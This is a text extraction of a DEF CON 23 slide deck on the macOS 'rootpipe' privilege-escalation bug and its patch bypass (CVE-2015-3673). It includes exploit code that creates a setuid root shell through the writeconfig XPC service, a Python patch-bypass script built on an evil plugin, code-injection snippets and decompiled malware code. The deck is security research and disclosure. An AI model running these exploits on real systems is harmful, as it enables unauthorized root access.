SlideShare uma empresa Scribd logo

DEFCON 23 - Patrick Wardle - stick that in your (root)pipe and smoke it

Felipe Prado
Felipe Prado

DEFCON 23 - Patrick Wardle - stick that in your (root)pipe and smoke it

Tecnologia
1 de 58
Baixar para ler offline
@patrickwardle STICK THAT IN YOUR (ROOT)PIPE & SMOKE IT
“sources a global contingent of vetted security experts worldwide and pays them on an incentivized basis to discover security vulnerabilities in our customers’ web apps, mobile apps, and infrastructure endpoints.” WHOIS @patrickwardle!! always looking for more experts!
xpc, rootpipe, malware, patches & 0days :) AN OUTLINE overview of XPC the bug in malware patch bypasspatch(es)
Credits hax0ring is rarely an individual effort Ian Beer Emil Kvarnhammar Pedro Vilaça uncovered rootpipe Jonathan1Levin "Mac OS X & iOS Internals" @emilkvarnhammar @osxreverser
OVERVIEW OF XPC modern IPC on OS X
a simple IPC mechanism which can provide security & robustness XPC “There are two main reasons to use XPC: privilege separation and stability.” -apple.com sandboxed 'XPC services' [privilege separation]
 [stability] each XPC service has its own sandbox crashes in the XPC services don't affect the app
used all over the place by Apple XPC IN OS X $!find!/System/Library/Frameworks!6name!*.xpc! AddressBook.framework/Versions/A/XPCServices/com.apple.AddressBook.FaceTimeService.xpc1 AddressBook.framework/Versions/A/XPCServices/com.apple.AddressBook.MapLauncher.xpc1 ...1 WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.Plugin.32.xpc1 WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.Plugin.64.xpc1 WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc1 
 $!find!/Applications!6name!*.xpc
 iPhoto.app/Contents/XPCServices/com.apple.PhotoApps.AVCHDConverter.xpc1 iPhoto.app/Contents/XPCServices/com.apple.photostreamOagent.VideoConversionService.xpc
 Xcode.app/Contents/Developer/Toolchains/.../XPCServices/SourceKitService.xpc1 Xcode.app/Contents/XPCServices/com.apple.dt.Xcode.Playground.xpc1 ... frameworks and apps that use XPC frameworks apps }
moving 'risky' code out-of-proc XPC display (uiI) } an 'unzip' XPC service a 'download' XPC service separate procs. w/ permissions 'normal' app XPC'd app allow deny deny deny XPC download, unzip, & display
the app, comms, & xpc service XPC COMPONENT RESPONSIBILITIES XPC'd app XPC serviceXPC comms make connection send requests (msgs) listen authenticate (optionally) handle requests
add 'xpc service' target to your application ADDING AN XPC SERVICE creating an XPC service embedded in app
how to listen for client connections XPC SERVICE LISTENER int!main(int!argc,!const!char!*argv[])!{! !!!!! //set!up!NSXPCListener!for!this!service! !NSXPCListener!*listener!=![NSXPCListener!serviceListener];! !//create/set!delegate! !listener.delegate!=![ServiceDelegate!new];! !!!!! //resuming!serviceListener!to!starts!service! ![listener!resume];! }! @implementation!ServiceDelegate! 
 //where!NSXPCListener!configures,!accepts,!&!resumes!incoming!NSXPCConnection! 6(BOOL)listener:(NSXPCListener!*)listener!shouldAcceptNewConnection:(NSXPCConnection!*)newConnection!{! !!!! //configure!the!connection,!by!setting!interface!that!the!exported!object!implements! !newConnection.exportedInterface!=![NSXPCInterface!interfaceWithProtocol:@protocol(imgXPCServiceProtocol)];! !!!!! !//set!the!object!that!the!connection!exports! !!newConnection.exportedObject!=![imgXPCService!new];! !!!!! !!//resume!connection! !![newConnection!resume];! !!!! //'YES'!means!connection!accepted! !!!!return!YES;! }! listening & accepting XPC connection(s) template code in main.m
@interface!imgXPCService!:!NSObject!<imgXPCServiceProtocol>! @end! @implementation!imgXPCService! //'remote'!XPC!method! 6(void)downloadImage:(NSURL!*)imageURL!withReply:(void!(^)(NSData!*))reply!! {! !!!!//download!image! !NSData!*!imageData!=![[NSData!alloc]!initWithContentsOfURL:imageURL];! !!!!! //reply!to!app! reply(response);! }! @end XPC SERVICE METHOD XPC'd app XPC service invoke method implement the desired logic
//make!connection! //!6>note:!'com.synack.imgXPCService'!is!name!of!service!! NSXPCConnection*!connectionToService!=!
 !![[NSXPCConnection!alloc]!initWithServiceName:@"com.synack.imgXPCService"];!!! //set!interface!(protocol)! connectionToService.remoteObjectInterface!=!! !![NSXPCInterface!interfaceWithProtocol:@protocol(imgXPCServiceProtocol)];! //resume! [connectionToService!resume]; look up by name, set interface, and go! CONNECTING/USING THE XPC SERVICE XPC'd app //invoke!remote!method! [[connectionToService!remoteObjectProxy]!downloadImage:@"http://synack.com/logo.png"!! !!!withReply:^(NSData*!imgData)!! {! !!!!!!!!//got!downloaded!image! !!!!!!!NSLog(@"got!downloaded!image!(size:!%#lx)",!imgData.length);! }]; connect to xpc service invoke 'remote' method XPC system will find service by name
ROOTPIPE an xpc-based bug
from past to present... A 'ROOTPIPE' TIMELINE 10/2014 4/2015 discovery by Emil 8/2014 XSLCMD malware OS X 10.10.3 'patched' 4/20152001 OS X 10.0? phoenix exploit on 10.10.3 6/2015 OS X 10.10.4 patched
creating a file THE HEART OF THE VULNERABILITY //get!default!file!manager! NSFileManager*!filemgr!=![NSFileManager!defaultManager];
 //create!file!w/!contents
 [filemgr!createFileAtPath:<path>!contents:<contents>!attributes:<attributes>]; 'source' code async!block!invoked!from!within! 6[WriteConfigDispatch!createFileWithContents:path:attributes:_withAuthorization:]! 
 mov!!!!!rdx,![rbx+20h]!!;!file!path! mov!!!!!rcx,![rbx+28h]!!;!file!contents! mov!!!!!r8,![rbx+30h]!!!;!file!attributes! mov!!!!!rsi,!cs:selRef_createFileAtPath_contents_attributes_!;!method! mov!!!!!rdi,!r14!!!!!!!!;!file!manager! call!!!!cs:_objc_msgSend_ptr disassembly 'writeconfig' XPC service problem?
create any file, anywhere as root! THE HEART OF THE VULNERABILITY $!ps!aux!|!grep!!writeconfig!
 !root!!!/System/Library/PrivateFrameworks/SystemAdministration.framework/XPCServices/writeconfig.xpc!!!!! 'writeconfig' runs as r00t //create!file!w/!contents
 [filemgr!createFileAtPath:<path>!contents:<contents>!attributes:<attributes>]; } the file path, contents, & permissions are fully controllable - allowing an unprivileged attacker to create files (as r00t), anywhere on the system! + =+ path contents permissions root!
an overview example EXPLOITATION writeconfig XPC service attacker's file (myShell) $!ls!6lart!/myShell! 6rwsrwxrwx!!1!root!!wheel!!/myShell! $!/myShell! #!whoami! root SystemAdministration framework {/bin/ksh, 04777, /myShell} XPC request
asdasdf STEP 1] GET INSTANCE OF 'WRITECONIGCLIENT' ___33__WriteConfigClient_sharedClient__block_invoke!proc!near! ...! mov!!!!!rdi,!cs:classRef_WriteConfigClient! mov!!!!!rsi,!cs:selRef_alloc! mov!!!!!rbx,!cs:_objc_msgSend_ptr! call!!!!rbx!;!_objc_msgSend! mov!!!!!rsi,!cs:selRef_init! mov!!!!!rdi,!rax! call!!!!rbx!;!_objc_msgSend +[WriteConfigClient sharedClient] disassembly link against SystemAdministration framework //get!class! Class!WriteConfigClient!=!NSClassFromString(@"WriteConfigClient");! //get!instance!
 id!sharedClient!=![WriteConfigClient!performSelector:@selector(sharedClient)]; SystemAdministration framework
authenticate against the remote xpc service STEP 2] AUTHENTICATE... ;6[WriteConfigClient!authenticateUsingAuthorization:]! ...
 mov!!!!!rdi,!cs:classRef_NSXPCConnection! mov!!!!!rsi,!cs:selRef_alloc! call!!!!cs:_objc_msgSend_ptr! mov!!!!!rsi,!cs:selRef_initWithServiceName! lea!!!!!rdx,!cfstr_Com_apple_sy_1! mov!!!!!rdi,!rax! call!!!!cs:_objc_msgSend_ptr //authenticate! [sharedClient!performSelector:@selector(authenticateUsingAuthorizationSync:)!withObject:nil]; ;6[WriteConfigClient!authenticateUsingAuthorization:]! mov!!!!!rbx,![r15+r14]! mov!!!!!rdi,!cs:classRef_NSXPCInterface! mov!!!!!rdx,!cs:protocolRef_XPCWriteConfigProtocol! mov!!!!!rsi,!cs:selRef_interfaceWithProtocol_! call!!!!cs:_objc_msgSend_ptr! mov!!!!!rsi,!cs:selRef_setRemoteObjectInterface_! mov!!!!!rdi,!rbx! mov!!!!!rdx,!rax! call!!!!cs:_objc_msgSend_ptr! mov!!!!!rsi,!cs:selRef_resume! call!!!!cs:_objc_msgSend_ptr inits XPC connection to 'com.apple.systemadministration.writeconfig' XPC request
get access to the message dispatcher STEP 3] GET 'DISPATCH' OBJECT //get!remote!proxy!object! id!dispatchObj!=![sharedClient!performSelector:@selector(remoteProxy)]; #!lldb!r00tPipe! ....! b!6[WriteConfigClient!remoteProxy]! Breakpoint!1:!where!=!SystemAdministration`6[WriteConfigClient!remoteProxy]! thread!return! po!$rax! <WriteConfigOnewayMessageDispatcher:!0x60000000bb10>! WriteConfigOnewayMessageDispatcher
ask the remote xpc service to kindly create us a file STEP 4] INVOKE 'REMOTE' METHOD //invoke!remote!object! [dispatchObj!createFileWithContents:CONTENTS!path:PATH!attributes:ATTRIBUTES]; forwardInvocation: selector += '_withAuthorization:' WriteConfigClient (sharedClient) remoteObjectProxy _NSXPCDistantObject invokeWithTarget: <NSInvocation:!0x60000046e240>! return!value:!{Vv}!void! target:!{@}!0x60000000c3c0! selector:!{:}! createFileWithContents:path:attributes:_withAuthorization:! argument!2:!{@}!0x6000000511c0! argument!3:!{@}!0x600000083ed0! argument!4:!{@}!0x6000000743c0! argument!5:!{@}!0x0 WriteConfig XPC service attacker's payload
'pls create me a root shell' COMBINED EXPLOIT $!./rootPipe!! step!0x1:!got!instance!<WriteConfigClient:!0x7f824141e670>! step!0x2:!authenticated!against!XPC!service! step!0x3:!got!instance!<WriteConfigOnewayMessageDispatcher:!0x7f8241433610>! step!0x4:!invoking!remote!XPC!method!to!create!/myShell!with!setuid!flag! $!/myShell!! #!whoami! root #!fs_usage!6f!filesystem! <rootPipe>! open!!!!!!!!!!!!!!F=4!!!!(R_____)!!/bin/ksh! read!!!!!!!!!!!!!!F=4!!!!B=0x154780! <writeconfig>! open!!!!!!!!!!!!!!F=4!!!!(RWC__E)!!/.dat014a.00b! write!!!!!!!!!!!!!F=4!!!!B=0x154780! rename!!!!!!!!!!!!!!!!!!!!!!!!!!!!!/.dat014a.00b! chmod!!!!!!!!!!!!!<rwsrwxrwx>!!!!!!/myShell!!!!!! chown!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!/myShell!!
create file .... NOTE ON OLDER VERSIONS //use!'Authenticator'!class! id!authenticator!=![Authenticator!performSelector:@selector(sharedAuthenticator)];! //authenticate!with!non6NULL!auth!object! [authenticator!performSelector:@selector(authenticateUsingAuthorizationSync:)!withObject:auth]; //use!'ToolLiaison'!class! id!sharedLiaison!=![ToolLiaison!performSelector:@selector(sharedToolLiaison)];! //get!'tool'!object! id!tool!=![sharedLiaison!performSelector:@selector(tool)];! //get!'tool'!object! [tool!createFileWithContents:!...] authentication requires and auth object file creation via ToolLiaison class //or!directly!via!via!'UserUtilities'!! [UserUtilities!createFileWithContents:!...]; will fail for non-Admins file creation via UserUtilities class }either
CHINA ALREADY KNEW malware with an 0day!? "somebody"
provides reverse shell, screen capture & keylogging OSX/XSLCMD Forced to Adapt: XSLCmd Backdoor Now on OS X
 
 “a previously unknown variant of the APT backdoor XSLCmd which is designed to compromise Apple OS X systems” -fireeye.com (9/2014) reverse shell screen capture keylogging no mention of any priv-esc exploit(s)
did the malware exploit rootpipe as an 0day!? OSX/XSLCMD & ROOTPIPE tweet: 4/2015 why no mention in FireEye's report!? OSX/XSLCmd
enabling access for 'assistive devices' to enable keylogging! MALWARE EXPLOITED ROOTPIPE (OS X 10.7/10.8) void!sub_10000c007()! r12!=![Authenticator!sharedAuthenticator];! rax!=![SFAuthorization!authorization];! rbx!=!rax;! rax!=![rax!obtainWithRight:"system.preferences"!flags:0x3!error:0x0];! if!(rax!!=!0x0)!{! !!![r12!authenticateUsingAuthorizationSync:rbx];! !!!rax!=![r12!isAuthenticated];! !!!if!(rax!!=!0x0)!{! !!!!!!rbx!=![NSDictionary!dictionaryWithObject:@(0x124)!forKey:*_NSFilePosixPermissions];! !!!!!!rax!=![NSData!dataWithBytes:"a"!length:0x1];! !!!!!!rax!=![UserUtilities!createFileWithContents:rax!path:@"/var/db/.AccessibilityAPIEnabled"!attributes:rbx];! !!!!!!!!!!!!!!!!!!!!!!!!!!! download sample: objective-see.com keylogging a .AccessibilityAPIEnabled =
APPLE'S RESPONSE #fail (initially)
upgrade or 'die' FAIL #1: NO PATCH < OS X 10.10 “Apple indicated that this issue required a substantial amount of changes on their side, and that they will not back port the fix to 10.9.x and older” -Emil 'patched' OS X Yosemite (v. 10.10.3) no (official) patch for OS X Mavericks & older = "How to fix rootpipe in Mavericks" @osxreverser
TL;DR: (attempt) to only allow authorized clients THE PATCH XPC comms writeconfig XPC service access check on clients unauthorized (non-apple) 'clients' can no longer connect to the remote writeconfig XPC service
only allow authorized clients to connect THE OS X 10.10.3 PATCH “The new (patched) version implements a new private entitlement called com.apple.private.admin.writeconfig. 
 If the binary calling the XPC service does not contain this entitlement then 
 it can’t connect anymore to the XPC.” @osxreverser NSXPCListenerDelegate allow's XPC server to allow/deny connection
decompilation of listener:shouldAcceptNewConnection PATCH DETAILS 6[WriteConfigDispatch!listener:shouldAcceptNewConnection:]! (NSXPCListener!*listener,!NSXPCConnection*!newConnection)! //get!audit!token! rbx!=!SecTaskCreateWithAuditToken(0x0,!listener);! //try!grab!"com.apple.private.admin.writeconfig"!entitlement! r13!=!SecTaskCopyValueForEntitlement(rbx,!@"com.apple.private.admin.writeconfig",!0x0);! //missing!entitlement?! if!(r13!==!0x0)!goto!error;! //!6>error!out,!disallowing!connection! error:! !!NSLog(@"###!Access!denied!for!unentitled!client!%@",!rbx); (new) entitlement checks } entitlements confer specific capabilities or security permissions embedded in the code signature, as an entitlement blob
the XPC service is still there FAIL #2: PATCH IS MERELY A ROAD BLOCK video
PHOENIX; ROOTPIPE REBORN exploitation on OS X 10.10.3
successfully (re)connect to the protected XPC service THE GOAL authentication is 100% dependent on entitlements, can we simply coerce a legitimate (entitled) binary to execute untrusted code? } infection? injection? hijacking? (evil) plugins? connect = win!
scan entire file system for com.apple.private.admin.writeconfig FIND 'ENTITLED' BINARIES #recursively!walk!(starting!at!r00t)! for!root,!dirnames,!filenames!in!os.walk('/'):! #check!all!files! !for!filename!in!filenames:! 
 !!!!#check!for!entitlements! !!!!output!=!subprocess.check_output(!! !!!!['codesign',!'6d',!'66entitlements',!'6',!os.path.join(root,!filename)])! !!!!#check!for!entitlement!key! !!!!if!'<key>com.apple.private.admin.writeconfig</key>'!in!output:! !!!#found!!:)! !!!!!!!! #!python!findEntitled.py! /System/Library/CoreServices/Finder.app/Contents/MacOS/Finder! /System/Library/CoreServices/Setup!Assistant.app/Contents/MacOS/Setup!Assistant!!!!!!!!!!!!!!!!!!!!!!!!!! /System/Library/CoreServices/Applications/Directory!Utility.app/Contents/MacOS/Directory!Utility! ... entitled binaries
can a entitled binary be infected/patched? INFECTION Process:!!!!!!!!!Directory!Utility![1337]! Path:!!!!!!!!!!!!Directory!Utility.app/Contents/MacOS/Directory!Utility! Exception!Type:!!EXC_CRASH!(Code!Signature!Invalid)! Exception!Codes:!0x0000000000000000,!0x0000000000000000 nope: loader verifies all digital signatures! killed by the loader load-time binary verification
can DYLD_INSERT_LIBRARIES be (ab)used? LOAD-TIME INJECTION $!DYLD_INSERT_LIBRARIES=rootPipe.dylib!Directory!Utility.app/Contents/MacOS/Directory!Utility //for!restricted!binaries,!delete!all!DYLD_*!and!LD_LIBRARY_PATH!environment!variables! static!void!pruneEnvironmentVariables(const!char*!envp[],!const!char***!applep)! {! !!!int!removedCount!=!0;! !!!const!char**!d!=!envp;! !!!for(const!char**!s!=!envp;!*s!!=!NULL;!s++)!{! ! !!!!if(strncmp(*s,!"DYLD_",!5)!!=!0)!! ! ! *d++!=!*s;!!! ! !!!!else!! ! ! !++removedCount;!!! ! !}!! ! !! !!!if!(removedCount!!=!0){! ! !!!!!dyld::log("dyld:!DYLD_!environment!variables!being!ignored!because!");!! ! !!!!!switch!(sRestrictedReason)!{!! ! !! !!!!!case!restrictedByEntitlements:!! ! !! ! !!!!!!!dyld::log("main!executable!(%s)!is!code!signed!with!entitlementsn",!sExecPath);!! nope: loader ignores DYLD_ env. vars for entitled binaries Mach-O loader & DYLD_ environment vars
can dylib hijacking be (ab)used? DYLIB HIJACKING nope: no vulnerable apps are entitled white paper
 www.virusbtn.com/dylib 'hijackable' apps
can code be injected into a entitled process? RUN-TIME INJECTION //shellcode!(here:!x86_64)! char!shellCode[]!=! !!!!!"x55"!!!!!!!!!!!!!!!!!!!!!!!!!!!//!pushq!!%rbp! !!!!!"x48x89xe5"!!!!!!!!!!!!!!!!!!!//!movq!!!%rsp,!%rbp! !!!!....
 //1:!get!task!for!pid! task_for_pid(mach_task_self(),!pid,!&remoteTask);
 
 //2:!alloc!remote!stack/code
 mach_vm_allocate(remoteTask,!&remoteStack64,!STACK_SIZE,!VM_FLAGS_ANYWHERE);
 mach_vm_allocate(remoteTask,!&remoteCode64,!sizeof(shellCode),!VM_FLAGS_ANYWHERE!);
 
 //3:!copy!code!into!remote!proc
 mach_vm_write(remoteTask,!remoteCode64,!(vm_address_t)shellCode,!sizeof(shellCode));
 
 //4:!make!remote!code!executable
 vm_protect(remoteTask,!remoteCode64,!sizeof(shellCode),!FALSE,!VM_PROT_READ!|!VM_PROT_EXECUTE);
 //5:!init!&!start!remote!thread
 remoteThreadState64.__rip!=!(u_int64_t)!(vm_address_t)!remoteCode64;! remoteThreadState64.__rsp!=!(u_int64_t)!remoteStack64;! remoteThreadState64.__rbp!=!(u_int64_t)!remoteStack64;
 
 thread_create_running(remoteTask,!x86_THREAD_STATE64,!(thread_state_t)&remoteThreadState64,!!!! !!!!!!!!!!!!!!!!!!!!!!x86_THREAD_STATE64_COUNT,!&remoteThread); nope: task_for_pid() requires r00t run-time process injection
can (app-specific) plugins be (ab)used? EVIL PLUGINS maybe!? Directory Utility appears to support plugins #!codesign!6d!66entitlements!6!/System/Library/CoreServices/Applications/Directory!Utility.app/ Contents/MacOS/Directory!Utility!! <?xml!version="1.0"!encoding="UTF68"?>! <!DOCTYPE!plist!PUBLIC!"6//Apple//DTD!PLIST!1.0//EN"!"http://www.apple.com/DTDs/ PropertyList61.0.dtd">! <plist!version="1.0">! <dict>! ! <key>com.apple.private.admin.writeconfig</key>! ! <true/>! </dict>! </plist> Directory Utility Plugins
can app-specific plugin loading be abused? EVIL PLUGINS #!fs_usage!6w!6f!filesystem! !! open!!!(R_____)!!/System/Library/CoreServices/Applications/Directory!Utility.app/Contents/PlugIns/ NIS.daplug/Contents/MacOS/NIS!! open!!!(R_____)!!/System/Library/CoreServices/Applications/Directory!Utility.app/Contents/PlugIns/ LDAPv3.daplug/Contents/MacOS/LDAPv3!! open!!!(R_____)!!/System/Library/CoreServices/Applications/Directory!Utility.app/Contents/PlugIns/ Active!Directory.daplug/Contents/MacOS/Active!Directory! ... void!6[PluginController!loadPlugins]!! {! !!!!rax!=![NSBundle!mainBundle];! !!!!rax!=![rax!builtInPlugInsPath];! !!!![self!loadPluginsInDirectory:rax];! !!!!return;! }! install evil plugin? Directory Utility loads plugins
simply copy in a plugin to 'install' & get loaded INSTALL THE PLUGIN (AS ROOT) plugin installed auth prompt :( but...plugin does get loaded
simply copy in a plugin to install & get loaded INSTALL THE PLUGIN The entitled 'Directory Utility' app will load (unsigned) plugins, which then can authenticate with the WriteConfig XPC service! but don't you need root to install plugin? owned by root :( ...but we can change that! #gameover
rootpipe reborn on OS X 10.10.3 PHOENIX, IN 1, 2, 3 copy Directory Utility to /tmp to gain write permissions copy plugin (.daplugin) into Directory Utility's internal plugin directory execute Directory Utility XPC request evil plugin attacker's payload authenticates WriteConfig XPC service Dir. Utility $!ls!6lart!/private/tmp! drwxr6xr6x!!patrick!!wheel!Directory!Utility.app
#trigger!rootpipe!on!OS!X!10.10.3! def!phoenix():! !!#copy!directory!utility.app!to!/tmp! !!#!6>this!folder!is!(obv)!accessible!to!all! !!shutil.copytree(DIR_UTIL,!destination)! !!#copy!evil!plugin!into!app's!internal!plugin!directory! !!#!6>since!app!is!in!/tmp,!this!will!now!succeed! !!shutil.copytree('%s'!%!(ROOTPIPE_PLUGIN),!'%s/%s/%s'!%!(destination,!DIR_UTIL_PLUGINS,!ROOTPIPE_PLUGIN))! !!#exec!Directory!Utility.app! !!#!6>will!trigger!load!of!our!unsigned!bundle!(Phoenix.daplug)! !!#!!!the!bundle!auth's!with!'WriteConfigClient'!XPC!&!invokes!createFileWithContents:path:attributes:! !!#!!!since!Directory!Utility.app!contains!the!'com.apple.private.admin.writeconfig'!entitlement,!we're!set!;)! !!os.system('open!"%s"!&'!%!destination)! !!!!!!!! if only all priv-esc bugs where this easy! PHOENIX.PY phoenix python script CVE-2015-3673 patched in OS X 10.10.4
....m0ar checks APPLE'S FIX; TAKE TWO OS X 10.10 OS X 10.10.3 OS X 10.10.46[WriteConfigDispatch!listener:shouldAcceptNewConnection:]
improved authentication & location checks APPLE FIX (CVE-2015-3673) OS X 10.10.4 new entitlements com.apple.private.admin.writeconfig.voiceover location checks binary in /System "The problem of their fix is that there are at least some 50+ binarie [sic] using it. A single exploit in one of them and the system is owned again because there is no fundamental fix inside writeconfig" @osxreverser } com.apple.private.admin.writeconfig.enable-sharing binary in /usr }
OS X DEFENSE keeping your mac secure
OBJECTIVE-SEE free OS X tools & malware samples malware samples :) KnockKnock BlockBlockTaskExplorer
KNOCKKNOCK UI detecting persistence: now an app for that! KnockKnock (UI)
KNOCKKNOCK UI VirusTotal integration detect submit rescan results VirusTotal integrations
BLOCKBLOCK continual runtime protection status bar BlockBlock, block blocking :)
TASKEXPLORER explore what's running filters
CONCLUSIONS …wrapping this up OS X security, is often quite lame! XPC interfaces malware patches } audit all thingz!
QUESTIONS & ANSWERS patrick@synack.com @patrickwardle feel free to contact me any time! "What if every country has ninjas, but we only know about the Japanese ones because they’re rubbish?" -DJ-2000, reddit.com final thought ;)
credits - thezooom.com - deviantart.com (FreshFarhan) - http://th07.deviantart.net/fs70/PRE/f/2010/206/4/4/441488bcc359b59be409ca02f863e843.jpg 
 - iconmonstr.com - flaticon.com //XPC http://www.objc.io/issues/14-mac/xpc/ images

Recomendados

Synack at ShmooCon 2015
Synack at ShmooCon 2015Synack at ShmooCon 2015
Synack at ShmooCon 2015Synack
 
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItDEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItSynack
 
Synack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack
 
Adding Security to Your Workflow with InSpec (MAY 2017)
Adding Security to Your Workflow with InSpec (MAY 2017)Adding Security to Your Workflow with InSpec (MAY 2017)
Adding Security to Your Workflow with InSpec (MAY 2017)Mandi Walls
 
OSDC 2017 | Building Security Into Your Workflow with InSpec by Mandi Walls
OSDC 2017 | Building Security Into Your Workflow with InSpec by Mandi WallsOSDC 2017 | Building Security Into Your Workflow with InSpec by Mandi Walls
OSDC 2017 | Building Security Into Your Workflow with InSpec by Mandi WallsNETWAYS
 
Virus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperVirus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperSynack
 
PuppetConf 2017: Automated System Compliance from the Inside Out- Trevor Vaug...
PuppetConf 2017: Automated System Compliance from the Inside Out- Trevor Vaug...PuppetConf 2017: Automated System Compliance from the Inside Out- Trevor Vaug...
PuppetConf 2017: Automated System Compliance from the Inside Out- Trevor Vaug...Puppet
 
Automated System Compliance From the Inside Out
Automated System Compliance From the Inside OutAutomated System Compliance From the Inside Out
Automated System Compliance From the Inside OutOnyxPoint Inc
 

Recomendados

Synack at ShmooCon 2015
Synack at ShmooCon 2015Synack at ShmooCon 2015
Synack at ShmooCon 2015Synack
 
DEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItDEF CON 23: Stick That In Your (root)Pipe & Smoke It
DEF CON 23: Stick That In Your (root)Pipe & Smoke ItSynack
 
Synack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack at AppSec California 2015 - Geolocation Vulnerabilities
Synack at AppSec California 2015 - Geolocation VulnerabilitiesSynack
 
Adding Security to Your Workflow with InSpec (MAY 2017)
Adding Security to Your Workflow with InSpec (MAY 2017)Adding Security to Your Workflow with InSpec (MAY 2017)
Adding Security to Your Workflow with InSpec (MAY 2017)Mandi Walls
 
OSDC 2017 | Building Security Into Your Workflow with InSpec by Mandi Walls
OSDC 2017 | Building Security Into Your Workflow with InSpec by Mandi WallsOSDC 2017 | Building Security Into Your Workflow with InSpec by Mandi Walls
OSDC 2017 | Building Security Into Your Workflow with InSpec by Mandi WallsNETWAYS
 
Virus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperVirus Bulletin 2015: Exposing Gatekeeper
Virus Bulletin 2015: Exposing GatekeeperSynack
 
PuppetConf 2017: Automated System Compliance from the Inside Out- Trevor Vaug...
PuppetConf 2017: Automated System Compliance from the Inside Out- Trevor Vaug...PuppetConf 2017: Automated System Compliance from the Inside Out- Trevor Vaug...
PuppetConf 2017: Automated System Compliance from the Inside Out- Trevor Vaug...Puppet
 
Automated System Compliance From the Inside Out
Automated System Compliance From the Inside OutAutomated System Compliance From the Inside Out
Automated System Compliance From the Inside OutOnyxPoint Inc
 
Security and dev ops for high velocity organizations
Security and dev ops for high velocity organizationsSecurity and dev ops for high velocity organizations
Security and dev ops for high velocity organizationsChef
 
Asterisk quick start Guide
Asterisk quick start Guide Asterisk quick start Guide
Asterisk quick start Guide King Astreisk Technologies
 
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpracticesConf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpracticesBrentMatlock
 
InSpec Workshop at Velocity London 2018
InSpec Workshop at Velocity London 2018InSpec Workshop at Velocity London 2018
InSpec Workshop at Velocity London 2018Mandi Walls
 
DevOpsDays InSpec Workshop
DevOpsDays InSpec WorkshopDevOpsDays InSpec Workshop
DevOpsDays InSpec WorkshopMandi Walls
 
BuildStuff.LT 2018 InSpec Workshop
BuildStuff.LT 2018 InSpec WorkshopBuildStuff.LT 2018 InSpec Workshop
BuildStuff.LT 2018 InSpec WorkshopMandi Walls
 
Razor, the Provisioning Toolbox - PuppetConf 2014
Razor, the Provisioning Toolbox - PuppetConf 2014Razor, the Provisioning Toolbox - PuppetConf 2014
Razor, the Provisioning Toolbox - PuppetConf 2014Puppet
 
Hardening Your Config Management - Security and Attack Vectors in Config Mana...
Hardening Your Config Management - Security and Attack Vectors in Config Mana...Hardening Your Config Management - Security and Attack Vectors in Config Mana...
Hardening Your Config Management - Security and Attack Vectors in Config Mana...Peter Souter
 
Nagios Conference 2012 - Eric Loyd - Nagios Implementation Case Eastman Kodak...
Nagios Conference 2012 - Eric Loyd - Nagios Implementation Case Eastman Kodak...Nagios Conference 2012 - Eric Loyd - Nagios Implementation Case Eastman Kodak...
Nagios Conference 2012 - Eric Loyd - Nagios Implementation Case Eastman Kodak...Nagios
 
From ci to cd - LavaJug 2012
From ci to cd - LavaJug 2012From ci to cd - LavaJug 2012
From ci to cd - LavaJug 2012Henri Gomez
 
Inside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisInside the Matrix,How to Build Transparent Sandbox for Malware Analysis
Inside the Matrix,How to Build Transparent Sandbox for Malware AnalysisChong-Kuan Chen
 
CEP Integration for Apache Stratos 4.0.0
CEP Integration for Apache Stratos 4.0.0CEP Integration for Apache Stratos 4.0.0
CEP Integration for Apache Stratos 4.0.0Manula Thantriwatte
 
GeekAustin DevOps
GeekAustin DevOpsGeekAustin DevOps
GeekAustin DevOpsMatt Ray
 
T2 – Continuous integration on aws
T2 – Continuous integration on awsT2 – Continuous integration on aws
T2 – Continuous integration on awsAmazon Web Services
 
Lviv MD Day 2015 Олексій Озун "Introduction to the new Apple TV and TVos"
Lviv MD Day 2015 Олексій Озун "Introduction to the new Apple TV and TVos"Lviv MD Day 2015 Олексій Озун "Introduction to the new Apple TV and TVos"
Lviv MD Day 2015 Олексій Озун "Introduction to the new Apple TV and TVos"Lviv Startup Club
 
Salt conf 2014 - Using SaltStack in high availability environments
Salt conf 2014 - Using SaltStack in high availability environmentsSalt conf 2014 - Using SaltStack in high availability environments
Salt conf 2014 - Using SaltStack in high availability environmentsBenjamin Cane
 
ITSAC 2011 SCAP for Inter-networking Devices
ITSAC 2011 SCAP for Inter-networking DevicesITSAC 2011 SCAP for Inter-networking Devices
ITSAC 2011 SCAP for Inter-networking Devicesc3i
 
Docker and Maestro for fun, development and profit
Docker and Maestro for fun, development and profitDocker and Maestro for fun, development and profit
Docker and Maestro for fun, development and profitMaxime Petazzoni
 
ContainerCon 2015 - Be a Microservices Hero
ContainerCon 2015 - Be a Microservices HeroContainerCon 2015 - Be a Microservices Hero
ContainerCon 2015 - Be a Microservices HeroDragos Dascalita
 
Aws microservice keynote
Aws microservice keynoteAws microservice keynote
Aws microservice keynotenextbuild
 
Automation with Packer and TerraForm
Automation with Packer and TerraFormAutomation with Packer and TerraForm
Automation with Packer and TerraFormWesley Charles Blake
 
AWS Sydney Summit 2013 - Continuous Deployment Practices, with Production, Te...
AWS Sydney Summit 2013 - Continuous Deployment Practices, with Production, Te...AWS Sydney Summit 2013 - Continuous Deployment Practices, with Production, Te...
